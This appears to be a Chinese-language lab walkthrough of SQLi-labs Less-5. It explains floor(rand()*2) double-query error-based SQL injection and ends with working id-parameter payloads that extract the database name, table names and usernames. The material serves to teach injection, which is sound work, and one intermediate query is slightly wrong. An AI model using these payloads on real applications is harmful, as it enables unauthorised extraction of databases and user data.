首先输入id=1和id=1’未报错,均显示You are in.....(如下图所示)
由上图可以看到,如果运行返回结果正确的时候只返回you are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。
再输入id=888,可以看到页面如下所示,没有显示位,无法使用联合查询。
接着我们输入id=2’如下图所示,页面出现SQL语句报错,在这里我们就可以使用一种新的注入方式:报错注入
首先在这里我们先对sql语言进行一个理解:
select concat((select database()));
真正执行的时候,先从子查询进行。因此执行select database() 这个语句就会把当前的数据库查出来,然后把结果传入到concat函数。这个函数是用来连接的。比如concat(‘a’,’b’)那结果就是ab了。
我们这里以数据库security为例,执行一下,如下图所示,就可以看到数据库是security
然后我们测试一下concat的用法:
输入select concat (“string”,”qaq”);可以看到输出结果就是把引号里面的内容连接起来了。
接下来我们测试rand随机函数是怎么用的,我们多执行几次找规律。
由上图执行结果可以看到,输出的结果都是随机的,且都是0到1之前的小数
接下来取整函数floor()上场了,我们随便输入一个小数取整
由上图可以看到取整数成功!然后我们看看双注入查询中的一个简单组合
因为rand()随机函数输出结果是在0到1之间,那么如果我们要使rand()随机函数输出结果是在0到2之间,那么我们就可以写成rand()*2了,如果我们对 rand()*2函数进行取整的话,那么输出结果一定是0或者1。
来,我们一起来尝试一下
输入select concat((select database()),floor(rand()*2));
再多尝试下
由上图我们可以看到输出结果不是security0就是security1。
接下来我们先查询下security数据库中有哪些表。
我们这里以emails表为例
输入select concat((select database()),floor(rand()*2)) from emails;
这里我在后面加了from emails(表名),那么返回结果是security0或security1的一个集合。数目是由表本身有几条结果决定的。比如一个管理表里有5个管理员。这个就会返回五条记录,这里emails表里有8个用户,所以返回了8条。
那么我们在后面添加from information_schema.schemata,就会返回6条结果,因为information_schema.schemata这个表里包含了mysql的所有数据库名,有6个数据库即就返回6条结果(如下图所示)
接下来我们可以加上group by语句了,group by是一个用来分组的语句,当然分组的话我们应该要起个组名对吧?那么如果我想实现把information_schema.schemata表里的security0分到一组,security1分到一组,分为两组起名为hh该怎么做呢?
输入:select concat((select database()), floor(rand()*2))as hh from information_schema.schemata group by hh;
由上图可以看到已经展示出来了一个分组,但是information_schema.schemata里面的表的数目没有一个具体的显示以及一个统计,所以我们应该使用聚合函数count(*)
select count(*),concat((select database()), floor(rand()*2))as hh from information_schema.schemata group by hh;
由上图看到,完全就是一个很好的总结,可以很明显的看到security0有4个,security1有2个。
我们也可以查询数据库的版本
可以查询数据库表的用户
现在我们可以开始注入了
尝试爆数据库名称
输入:
id=1' union select null,count(*),concat((select database()),floor(rand()*2))as hh from information_schema.schemata group by hh --+
多刷新几次
爆数据库下的表名称
首先我们输入id=1' union select null,count(*),concat((select table_name from information_schema.schemata where table_schema='security'),floor(rand()*2))as hh from information_schema.tables group by hh--+来试试
这里显示了输出结果超过一行,那么我们就应该用到limit了,还记得前面的limit怎么用的嘛?忘记了再倒回去看前面的less-1哦
这里我们输入:
id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2))as hh from information_schema.tables group by hh--+
好的,从上面我们可以看到把表users1爆出来了,多刷新几次发现爆出来的表,我们就会发现,爆出来的结果要么是users1要么是users0,这不就达到了我们想要的结果了吗?
下面我们就可以来查询users表下面的字段了
输入id=1' union select null,count(*),concat((select username from users limit 3,1),floor(rand()*2))as hh from information_schema.tables group by hh--+
以上就是我们通过报错注入来实现我们想要的东西~